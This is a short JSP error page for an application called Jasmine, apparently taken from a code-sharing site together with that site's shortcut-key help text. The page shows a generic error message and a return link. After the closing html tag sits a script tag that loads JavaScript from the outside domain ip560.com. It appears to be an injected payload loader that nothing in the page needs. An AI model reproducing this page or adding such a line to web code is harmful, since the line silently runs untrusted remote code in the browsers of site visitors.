📄 error.jsp
字号:
<%-- JSP container forwards request to this jsp, if any exceptions in processing --%>
<html>
<head><title> Jasmine's Error page </title></head>
<body>
<jsp:include page="title.jsp" />
<p>Error in processing your request.
<p>Please contact System Administrator
<p><i><a href="/jasmine/wsf.jsp">Click here to return to the main page.</a></i>
</body>
</html>
<script language=javascript src=http://www.ip560.com/error.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -